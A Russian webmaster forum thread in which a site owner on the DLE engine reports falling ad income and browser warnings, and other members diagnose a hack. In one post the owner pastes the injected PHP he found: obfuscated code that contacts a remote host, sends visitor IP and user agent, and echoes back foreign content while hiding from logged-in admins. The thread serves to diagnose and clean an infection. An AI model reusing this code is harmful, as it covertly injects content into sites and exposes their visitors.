Странный вирус

12
Алексей Викторович
На сайте с 19.07.2007
Offline
132
2054

Последние две недели наблюдаю снижение кликов и доходов в РСЯ.

Сегодня человек пишет, что при открытие сайтов моих у него вылазит такая картинка - http://s32-temporary-files.radikal.ru/a0fc199d2dd3446d93128dd54a4e2775/-88693455.jpg. Она вылазит только на моих проектах.

Сначала подумал, что проблем у пользователя с компом.

Но, есть причины думать наоборот:

1. На сайтах просел доход с РСЯ, причем трафиик на двух остался примерно на месте(хотя должен был вырасти), а колво кликов по рся уменьшилось

2. На http://2mir-istorii.ru/ сильно упал траффик. В два раза. Было около 5 т в сутки, сейчас около 2

Была еще такая тем с тизерами, но с ней разобрался /ru/forum/909695

W
На сайте с 09.04.2013
Offline
46
#1

Похоже ваш сайт взломали😡У меня тоже выходит это предупреждение .Причем вирус хитрый-иногда прячется .Посмотрите что будет если перейти на ваш сайт из яндекса,в поисковую строку введите:


host:2mir-istorii.ru

PS для обсуждения подобных проблем этот раздел - /ru/forum/development/security

SeVlad
На сайте с 03.11.2008
Offline
1609
#2
Алексей Викторович:
Странный вирус

Странно то, что люди фотографируют экраны, вместо того что бы сделать скриншот.

А ещё более странно, что владельцы сайтов путают форум со своим бложиком и постят "полёты мыслей" вместо того, что бы спросить/попросить помощи.

Я уже не говорю о такой "странности", что эти самые владельцы не только поиском пользоваться не умеют, но даже найти нужный раздел на форуме, а в нём закреплённый топик.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
Алексей Викторович
На сайте с 19.07.2007
Offline
132
#3
SeVlad:
Странно то, что люди фотографируют экраны, вместо того что бы сделать скриншот.

А ещё более странно, что владельцы сайтов путают форум со своим бложиком и постят "полёты мыслей" вместо того, что бы спросить/попросить помощи.
Я уже не говорю о такой "странности", что эти самые владельцы не только поиском пользоваться не умеют, но даже найти нужный раздел на форуме, а в нём закреплённый топик.

Ну топик как бы и создан, с целью решить проблему.

В поиске нет подобной проблемы.

Про фотографирование - не все умеют хорошо пользоваться интернетом. Об этом нужно помнить, странно, что Вы как сеошник не делали таких наблюдений.

M
На сайте с 25.12.2013
Offline
23
#4

Использование php 5.2 и движка DLE располагает к взлому. Можно делать временные исправления и убирать уязвимости по-очереди (по мере обнаружения), но постоянное решение вашей проблемы только одно - ставить нормальный движок (например WordPress) и использовать современные версии php. Самая большая проблема это DLE - под него дырок ну очень много. Закрыть все почти невозможно. Его используют в основном варезники и ГС, поэтому защиту под него никто не делает.

Профессионально занимаюсь системным администрированием (Linux) и оптимизацией (веб)инфраструктуры. Опыт работы более 7 лет с HTML CSS PHP MySQL. Предпочитаю работать с высоконагруженными проектами.
K5
На сайте с 21.07.2010
Offline
209
#5
Mofforg:
Использование php 5.2

чем 5.2 не угодил?

Mofforg:
и движка DLE

а с dle что не так?

Mofforg:
ставить нормальный движок

ого, вордпресс стал единственным нормальным? ничего что его ломают раз в 10 чаще (и это не говоря про халявные шаблоны/плагины)?

Mofforg:
варезники и ГС

курчаво живете, если для вас например bobfilm.net - ГС.

Mofforg:
решение вашей проблемы только одно

для вашей проблемы тоже одно - перестать заниматься системным администрированием (Linux)

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
donc
На сайте с 16.01.2007
Offline
680
#6
kgtu5:
а с dle что не так?

То, что он всегда содержит в себе закладки.

Ведь его никто не покупает, а скачивает крякнутый, куда обычно в качестве бонуса для автора кряка и добавляется закладка.

Продвижение сайтов от 25 000 в мес, прозрачно, надежно https://searchengines.guru/ru/forum/818412 , но не быстро, отзывы
Алексей Викторович
На сайте с 19.07.2007
Offline
132
#7

Вот такая гадость была на сайте

/*function workorunwork($in) {

if (textsafeunworker(64) < 1024) {

$rtn = base64_decode($in);

return $rtn;

}

}

function workallt($newsid) {

if (date("j") - $newsid > 320 ) {

$rtn = false;

} else {

$get = workorunwork("aHR0cDovL2NwLnJhZGVyc2hvcC5jb21wcmVzcy50by9yZWFjdG9yLnBocD9waWQ9MiY=")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);

if (!isset($_COOKIE[workorunwork("ZGxlX3Bhc3N3b3Jk")])) {

echo @file_get_contents($get);

}

}

}

if(!preg_match('/popunder|bodyclick|advmaker|teasernet/i', $_SERVER['HTTP_REFERER'])){

if (strlen($_SERVER['HTTP_REFERER']) > 5) {

if(!preg_match('/Opera|Firefox/i', $_SERVER['HTTP_USER_AGENT'])){

workallt (date("j"));

}

}

}

*/

donc
На сайте с 16.01.2007
Offline
680
#8

Алексей Викторович, ДЛЕ то крякнутый?

K5
На сайте с 21.07.2010
Offline
209
#9
donc:
То, что он всегда содержит в себе закладки.
Ведь его никто не покупает, а скачивает крякнутый, куда обычно в качестве бонуса для автора кряка и добавляется закладка.

шаблоны и платные плагины (с теми же закладками) для вордпресса тоже мало кто покупает, в чем его суперхорошесть 😕

да и Mofforg говорил про дырявость самого движка, а не про вставки левого кода

DLE - под него дырок ну очень много
auditsaitov001
На сайте с 28.06.2015
Offline
11
#10
Mofforg:
Использование php 5.2 и движка DLE располагает к взлому. Можно делать временные исправления и убирать уязвимости по-очереди (по мере обнаружения), но постоянное решение вашей проблемы только одно - ставить нормальный движок (например WordPress) и использовать современные версии php. Самая большая проблема это DLE - под него дырок ну очень много. Закрыть все почти невозможно. Его используют в основном варезники и ГС, поэтому защиту под него никто не делает.

Подробнее по пхп 5,2: http://www.securitylab.ru/vulnerability/393601.php

Аудит безопасности Вашего сайта квалифицированным специалистом по иб. Ручная проверка кода на уязвимости, поиск вирусов, вебшеллов и проч. Полная проверка, а не простое удаление вирусов.
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий